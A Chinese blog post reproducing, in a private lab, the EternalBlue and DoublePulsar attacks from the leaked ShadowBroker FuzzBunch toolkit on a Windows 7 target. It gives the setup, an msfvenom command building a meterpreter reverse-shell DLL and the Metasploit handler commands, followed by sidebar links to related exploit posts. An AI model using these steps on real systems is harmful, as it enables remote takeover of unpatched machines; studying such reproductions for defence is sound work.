ShadowBroker攻击框架FuzzBunch实战之EternalBlue

最新推荐文章于 2021-07-20 21:30:55 发布
最新推荐文章于 2021-07-20 21:30:55 发布
阅读量1w 收藏 9
点赞数 5
分类专栏: 安全漏洞 SMB 文章标签: ShadowBrok
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/counsellor/article/details/70214649
版权

环境准备:

IP地址角色操作系统必需依赖备注
192.168.119.164靶机Win7 SP1 64-bits\关闭防火墙,保证没有2017年微软系统补丁
192.168.119.153攻击机(主)WinXP SP3 32-bitsPython2.6.6和pywin32安装包python 2.6别太老,否则没有Scripts目录安装pywin32模块
192.168.119.152攻击机(辅助)kali1-amd64\用来生成payload,这里主要是使用msf生成的dll后门

攻击方法:

在xp上用命令行进入fb.py所在的目录,运行fuzzbunch.

C:\Documents and Settings\Administrator>cd c:\TDDOWNLOAD\master\shadowbroker-mas
ter\windows\
C:\TDDOWNLOAD\master\shadowbroker-master\windows>python fb.py

这里写图片描述

设置全局参数

  1. Default Target IP Address(默认靶机IP): 192.168.119.164
  2. Default Callback IP Address(默认监控主机IP): 192.168.119.152
  3. Use Redirection(使用重定向): no
  4. Set LogDir(设置日志路径): c:\logs\

这里写图片描述

使用EternalBlue攻击靶机,这里需要注意的是,事先要确定靶机的操作系统,这个类型要做选择。

P.S. 2018年12月4日补充: 截图

use Eternalblue

一路回车
在这里插入图片描述
另外就是攻击方式,需要选择FB

这里写图片描述

生成反弹shell用的dll文件

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.119.152 LPORT=8089 -f dll >reverser_tcp_64.dll

这里写图片描述

使用DoublePulsar攻击靶机
这次要准备攻击负载,这里使用的是dll反弹shell。与EternalBlue一样,需要选择靶机系统类型。

切记, ProcessName [lsass.exe]者一项是默认,否则无法运行后门。

这里写图片描述

进入Kali,开启监听
监听shell的主机要在反弹shell前启动才能收到反弹的shell。

use exploit/multi/
Display all 234 possibilities? (y or n)
msf > use exploit/multi/handler 
msf exploit(handler) > set LHOST 192.168.119.152
LHOST => 192.168.119.152
msf exploit(handler) > set LPORT 8089
LPORT => 8089
msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > exploit

这里写图片描述
攻击成功效果图

这里写图片描述

问题
用fb脚本开始会提示listeningposts目录找不到的错误

在windows目录下手动创建listeningposts目录就好了

counsellor
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
Shadow Brokers 渗透工具.zip
01-01
Shadow Brokers 渗透工具
linux运行fuzzbunch,[原创]漏洞之永恒之蓝(简单复现)
weixin_39943383的博客
05-10 271
漏洞分析之永恒之蓝(ms17-010)目录☛ 1.漏洞介绍1.漏洞描述Eternalblue通过 TCP 端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的windows机器,无需用户任何操作,只要开机上网,就能在电脑中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序2.漏洞影响目前已知受影响的windows版本包括但不限于:Windows ...
ShadowBroker释放的NSA工具部分(windows)fb.py复现和中招检查方法(勒索病毒原理)
人工智能
05-13 7098
工具下载 1、Python2.6和pywin32安装包(注意都是32位的,不然会导致调用dll payload文件失败): 复现python和pywin32安装包 (分流下载:http://pan.baidu.com/s/1jHKw0AU 密码:kuij) 2、Shadowbroker放出的NSA攻击工具 https://github.com/misterch0c/
ddrfuzz:基于seq2seq模型的模糊系统以生成有价值的种子语料库
03-25
DDRFuzz(数据驱动模糊)
fuzzbunch-debian, Debian Intructions的Fuzzbunch部署.zip
09-17
fuzzbunch-debian, Debian Intructions的Fuzzbunch部署 kali/fuzzbunch debian部署指南用于 kali linux的nsa/fuzzbunch部署- Intructions 。 这个版本是在 kali linux ( 。增强我们的个人pentesting工具) 下使
ShadowBrokers方程式工具包浅析
BaymaxJW的博客
01-23 2403
一、解密后的工具包: 其中Windows目录包括Windows利用工具和相关攻击代码,swift目录中是银行攻击的一些证据,oddjob目录是植入后门等相关文档。 Windows目录:(包含了各种漏洞利用工具,在exploits中包含了丰富的漏洞利用工具,可影响windows多个平台) 三个比较重要的文件:exploits,fuzzbunch,specials A:exploits...
黑客工具包ShadowBrokers浅析
Qcloud_KID的博客
04-17 2502
臭名昭著的方程式组织工具包再次被公开,TheShadowBrokers 在 steemit.com博客上提供了相关消息。 本次被公开的工具包大小为117.9MB,包含23 个黑客工具,其中部分文件显示 NSA 曾入侵中东 SWIFT 银行系统,工具包下载接见文后参考信息。 解密后的工具包: 其中 Windows 目录包括 Windows 利用工具和相关攻击代码,swift
linux运行fuzzbunch,方程式0day ETERNALBLUE复现之Empire &ampamp; Msfconsole下的she...
weixin_29292431的博客
05-10 154
在本文中我将为大家复现在前段时间被曝出的,方程式0day Eternalblue的利用过程。Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞。从涵盖的操作系统版本来看,Eternalblue针对的范围也非常广泛。从Windows XP到Windows Server 2012都为其攻击对象。而Windows 10和Windows Server 2016,...
fuzzbunch工具实现dll注入
Ms08067安全实验室
07-20 863
文章来源|MS08067内网安全知识星球本文作者:BlackCat(Ms08067 内网小组成员)前言上阶段无意间接触到了这个工具,感觉功能还可以,在最近的hw中,测试发现,在一些08的...
Shadow broker IPC$.rar
12-31
Shadow broker安全测试渗透工具点击帽子即可进入使用软件 <<<<<>>>>>> 黑色命令输入框载入以下功能 >启动445pro生成窗口>>>>>>>>>>>>> 链接: https://pan.baidu.com/s/1JqTrBo4L0cYuTqamPFMSLA 提取码: 7rr1 启动ipC$渗透窗口启动命令Startcmd.exe Ptart135ipc$启动135ipc$渗透窗口 Dtart1433启动1433渗透文本 Etar445启动445渗透文本 Rtar135启动135渗透文本 GtarHOUMENFENGE启动分离 LtarWENJIANKUNBANGJIANCEFENLIQI文件捆绑检查分离器 HtarFANWENJIANKUNBANGGONGJU反文件捆绑器
Python-FuzzbunchPythonWine包装
08-12
Fuzzbunch Python-Wine 包装
人工智能技术在安全漏洞领域的应用
01-14
软件数量的大规模增长以及复杂性的增强给软件安全漏洞的研究带来了严峻的挑战,以人工的方式进行安全漏洞研究的效率较低,无法满足网络空间安全的需要。因此,如何将机器学习、自然语言处理等人工智能技术应用于安全漏洞的研究已成为新的热点,人工智能技术能够智能化地处理漏洞信息来辅助安全漏洞研究,同时提高安全漏洞挖掘的效率。首先分析了安全漏洞的自动化挖掘、自动化评估、自动化利用和自动化修补等关键技术,指出安全漏洞挖掘的自动化是人工智能在安全漏洞领域应用的重点,然后分析和归纳了近年来提出的将人工智能技术应用于安全漏洞研究的最新研究成果,指出了应用中的一些问题,给出了相应的解决方案,最后展望了安全漏洞智能研究的发展趋势。
shadowbroker
06-15
Shadowbroker 需要启动并运行“海外”socks5 代理,最简单的是使用 ssh: ssh user@remote -D 127.0.0.1:1081 -g -N 如果您不关心安全,请添加-c blowfish ,使用autossh来稳定连接。 然后运行影子经纪人: ./...
windbg独立安装包下载
热门推荐
counsellor的专栏
06-26 4万+
0x00 软件名称: Debugging Tools for Windows 0x01 软件版本: 6.12 0x02 适用操作系统: windows 7 windows xp 0x03 官方下载地址 x64 http://download.microsoft.com/download/A/6/A/A6AC035D-DA3F-4F0C-ADA4-37C8E5D34E3D/se...
repo 工具使用手册
counsellor的专栏
01-22 1万+
0x00 前言 该说点什么好呢,看到这个系列的第一篇的时间戳,已经是2年前了,生活总是这样要温故知新。安卓的项目已经从30个G变成了40多G,完全就是一个monstor一样的进化过程,不得不承认,能维护这么庞大的开源代码,是一件很不可思议的事情。 前一段时间微软宣布放弃edge浏览器内核的开发,准备启用chrome内核,一方面说明浏览器的复杂程度已经超出了自己预期成本,另一方面体现了开源项目的生命...
linux中ret2libc入门与实践
counsellor的专栏
08-23 6725
前言 本来想找一个windows下的栈溢出漏洞的poc作为漏洞分析路程的开篇,但是一路走来遇到了太多的问题,大大小小,什么都有。同时因为工作事情比较多,能拿出来调试和写文章的时间也是断断续续。昨天刚有一点心得,今天就忘了一大半,同时会推翻自己之前的结论。 经过漫长的求证过程,打算把NX利剑-ret2libc这种方法和其原理用简单直接的方式展示出来。 简介 DEP-数据执行保护(Data...
PowerShell提示此系统中禁止执行脚本的解决方法
counsellor的专栏
11-21 6078
【问题】 在win7下运行powershell脚本提示系统禁止执行脚本,估计是系统默认禁止执行powershell脚本。 具体提示如下: PS C:\Users\momocha\Desktop&gt; .\Invoke-ReflectivePEInjection.ps1 无法加载文件 C:\Users\momocha\Desktop\Invoke-ReflectivePEInjection.ps1...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值